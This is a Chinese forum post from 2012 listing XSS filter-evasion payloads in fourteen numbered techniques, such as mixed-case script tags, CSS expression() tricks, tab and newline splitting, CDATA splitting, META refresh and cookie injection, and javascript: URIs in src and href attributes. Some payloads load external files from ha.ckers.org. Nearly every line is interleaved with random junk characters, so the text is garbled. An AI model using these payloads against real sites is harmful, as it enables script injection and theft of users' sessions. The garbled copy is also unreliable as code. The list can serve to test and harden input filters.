1. 改变字符大小写
0 s6 @. z7 m7 `. ]0 i: H" ^
/ o6 k/ u9 V) E3 W
: R0 i% J' m% _" v% l
7 F/ w9 y- G( a) r5 q& ^; h <sCript>alert(‘d’)</scRipT>
- C) M8 z( ~# v
* \# |4 t$ ^7 G' c# L& D( v( F2. 利用多加一些其它字符来规避Regular Expression的检查" V! @, v# K& z9 K! b
1 r- `7 ] I8 q4 f) l7 Z <<script>alert(‘c’)//<</script>
* z8 P/ b6 j3 T5 o1 I" `# z. J$ L3 b6 p; p4 m
<SCRIPT a=">" SRC="t.js"></SCRIPT>
& a3 \, M) ~! ], ?5 E6 G& j z
9 e! W, y& x2 p" m. N <SCRIPT =">" SRC="t.js"></SCRIPT>+ }+ q- h G4 p! I# r9 d+ z- h
8 K# M# }+ H) {9 l+ [5 R; ]/ {, [4 i <SCRIPT a=">" ” SRC="t.js"></SCRIPT>) {, }( @" {+ C s* T9 R( ?' h8 p
+ u% x; Z) i+ s2 m& a <SCRIPT "a=’>’" SRC="t.js"></SCRIPT>/ v7 {- E" C' r" U3 F% f
' c$ O. ~* b6 y
<SCRIPT a=`>` SRC="t.js"></SCRIPT>
$ Q/ e& C5 [, D1 m, X( K6 [5 G0 Q" w9 `" D2 C. O
<SCRIPT a=">’>" SRC="t.js"></SCRIPT>, k$ f8 j# K6 B2 y) Q
; X: A5 p8 g* J5 W3 n8 J
3. 以其它扩展名取代.js5 r$ t; _/ T2 Z1 Y+ E0 |
' |0 e) P5 @# u; \' |4 ] <script src="bad.jpg"></script>: o F1 P, n: U6 K8 }+ u% \- O
A( T. q7 j5 N+ F, t4 T
4. 将Javascript写在CSS档里
; N, X0 x% H2 y8 R4 o. p& ]% i: {/ {5 Q' ]) x7 K9 ?
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
* w* G9 x4 i, e7 c/ D/ O$ `4 l0 C# j2 t( L2 O: G
example:# S: y0 w1 i' m: d
. n. ?+ c; T f7 v. x" }' }; ?
body {1 q% A! C1 W. v4 A5 a' D
: U3 m/ W2 {2 ~% y background-image: url(‘javascript:alert("XSS");’). i, G/ @# e8 l. K
. B x7 Z% ?+ m# h
}0 R! ~+ Y8 D4 G
0 Y3 d3 H5 q; L0 v" r/ H5. 在script的tag里加入一些其它字符# K& e7 q$ [7 g1 v# E
* d) {9 R: f( n2 z <SCRIPT/SRC="t.js"></SCRIPT>6 w" f, G+ H3 d% v& P
, J* `: _, q: f+ [% u E <SCRIPT/anyword SRC="t.js"></SCRIPT>; N% ^4 G. r; Z3 P
( R- [8 z" b6 w$ T4 p5 d4 _) }6. 使用tab或是new line来规避
( P Y4 r+ L% ~1 W9 u) p4 h; w/ \7 E( y/ v; ^$ {0 {% I# Q
<img src="jav ascr ipt:alert(‘XSS3′)">
& i( f7 ^* Z6 }1 }3 H. o. i+ _: Z0 B7 A
<img src="jav ascr ipt:alert(‘XSS3′)"># u6 ]( x2 Q# ^ e& p
3 I' x% s. \* K$ Z <IMG SRC="jav ascript:alert(‘XSS’);">: V; {3 @ \4 {5 @$ T0 S
6 Z/ w- k% S. f -> tag
, g' J9 W: h, x+ J( q; A; q, I3 H$ R1 x; a0 v, c
-> new line: S- R: y j0 }
S k1 m. G; d& b: N6 i! f
7. 使用"\"来规避
: c7 n1 n) X# Z
9 `: M- K) p: \) | <STYLE>@im\port’\ja\vasc\ript:alert("XSS32")’;</STYLE>) M$ t& e7 R0 ?% d* Q- n
/ h8 \* y$ ~; w% U w <IMG STYLE=’xss:expre\ssion(alert("XSS33"))’>. e/ [1 c7 ? d4 p4 O
/ u, g. q" n- M <IMG STYLE="xss:expr/*anyword*/ession(alert(‘sss’))">6 ^5 R) D: z. u/ d; z
. H, J( ^) f/ k6 ^
<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">. S; Q, @( L( T5 Y8 Q
9 @% \+ Q7 c* `+ D <A STYLE=’no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))’>8 v0 y3 L1 @% ]9 A" U! l
( K- O! W. U" e% v- P( F
8. 使用Hex encode来规避(也可能会把";"拿掉)9 x. H: z! b. |% @9 ^
+ x1 s+ v4 a1 \: f9 b4 C/ ] <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">7 K8 x( ~$ X J4 `/ ]
$ R2 H6 k& {/ Q. |* z7 X 原始码:<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">3 k% N, G, ]7 U( ]; w
9 g. P5 q2 N# g$ z
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);"> S6 o. |: ?) v. F
F9 G$ g1 H6 w
原始码:<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">
5 k# F8 W* t/ M9 o" e+ }* _) n+ x( B& y) y9 m
9. script in HTML tag
( s. P- u) `: ]0 [# R; D# ?7 A0 h
5 t3 h8 S+ E9 D! C; m <body onload=」alert(‘onload’)」>5 G8 [9 W" V* |: l# n
8 j3 ~6 A( _ G. T: T
onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload/ @3 O( j" @2 a7 j9 O( N+ M4 [
' T5 A& f8 J" W; g10. 在swf里含有xss的code! t7 ^6 H. {, }$ n, K
3 S+ ]* Z4 I& I, a8 w' o
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
& x( I9 C- r% h% B& L% L3 j W. V
11. 利用CDATA将xss的code拆开,再组合起来。
! a6 m. n, w/ y' D% j% ]+ _
* P: J: g# c4 S+ D% v5 j* g6 D5 Q <XML ID=I><X><C>
: l' u! p/ _4 J A) S B/ c- F; ^& v% Y- d
<![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
! Y0 `3 g: f$ ^0 C; p/ D; } s/ k4 C
</C></X>' T' i# Q2 A& j. y U
8 Q3 w! _9 S H1 ?8 r
</xml>' D( a+ s* Y; B1 U5 _' C. O' J1 Y2 \
% w+ r1 ]5 R9 V& K7 s- F <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>/ P$ N, Z- a3 J, [
- h9 k7 y) ~. w! g0 C <XML ID="xss"><I><B><IMG SRC="javas<!– –>cript:alert(‘XSS’)"></B></I></XML>
2 m* X% K( Y- ?) Y! z9 q6 t$ a1 v1 \# v- N7 |3 ~& } j
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
) E/ U! v8 `" [
& S7 ~' l& C: \8 ^* I9 ]12. 利用HTML+TIME。( g4 a& W& |/ g; s% B# y
7 H% }/ ~9 q) T' Q: c( R
<HTML><BODY>0 k; w9 J) u& o4 y" o7 u& f" R
9 H" i& z) T9 H/ D0 a3 O
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
: F6 b9 r; N7 G* |" j( J
1 A( O* V' J" _8 s <?import namespace="t" implementation="#default#time2">( p* w: ]; p+ r5 A* i
7 k4 A# j8 T0 J, s
<t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>">4 d8 a4 k8 _+ g% I
# Y7 g: v5 _8 t </BODY></HTML>
) Q+ N2 g% R4 p/ U0 B& _
) y! m# E# [3 Q }. G3 u13. 透过META写入Cookie。
. ^3 d# r2 R7 U0 Y! n9 Z6 K, Z
0 i/ }- r8 Z4 _+ s# C8 | <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>">4 `7 p3 ~ M W ?5 ^
7 E7 h2 ~, n9 Z. ^9 N14. javascript in src , href , url0 [+ b/ @( X1 _4 A6 s. M+ V
" p: G# l7 }- a/ w1 e+ o) Z& ?
<IFRAME SRC=javascript:alert(’13′)></IFRAME>
, P9 Y/ S8 E" I O7 ^+ E- z6 W; Q. b5 j
<img src="javascript:alert(‘XSS3′)">4 ?# v, M' V5 r( O0 P$ E! K
5 v+ V1 ^2 C+ B8 R7 a<IMG DYNSRC="javascript:alert(‘XSS20′)">
v$ ] o1 Q7 W( D# r) c/ n5 s5 \4 z( |/ |- T
<IMG LOWSRC="javascript:alert(‘XSS21′)">" v0 o# ~' z+ h1 N1 h0 L, q
- R" c5 N0 ~& ] <LINK REL="stylesheet" HREF="javascript:alert(‘XSS24′);">! `2 F X+ [$ a2 l& J0 q" u2 W
! A5 ^# v/ X2 g% ?& P M4 M
<IFRAME SRC=javascript:alert(‘XSS27′)></IFRAME>
1 B8 C4 B0 Q5 n
2 N) g0 j5 {% |( F <TABLE BACKGROUND="javascript:alert(‘XSS29′)">
$ S) ?9 [0 D. m2 A; ~" B- V% u8 i. u
<DIV STYLE="background-image: url(javascript:alert(‘XSS30′))">
$ h9 J! G1 I* Y- r9 S4 P
$ w2 Z" N3 }* K/ H3 U <STYLE TYPE="text/css">.XSS{background image:url("javascript:alert(‘XSS35′)");}6 |# _5 I3 R4 W7 U {
. n8 b6 c* F3 J% K$ a </STYLE><A CLASS=XSS></A>
( e* b8 o7 | H W4 z/ \
, x, u7 l2 s7 H1 |) K/ M9 s <FRAMESET><FRAME SRC="javascript:alert(‘XSS’);"></FRAMESET>
, o4 O3 m" b4 W
7 C+ W/ q7 a' n& Z9 n* ~ |
发表于 2012-12-31 09:59:28
收藏
支持
反对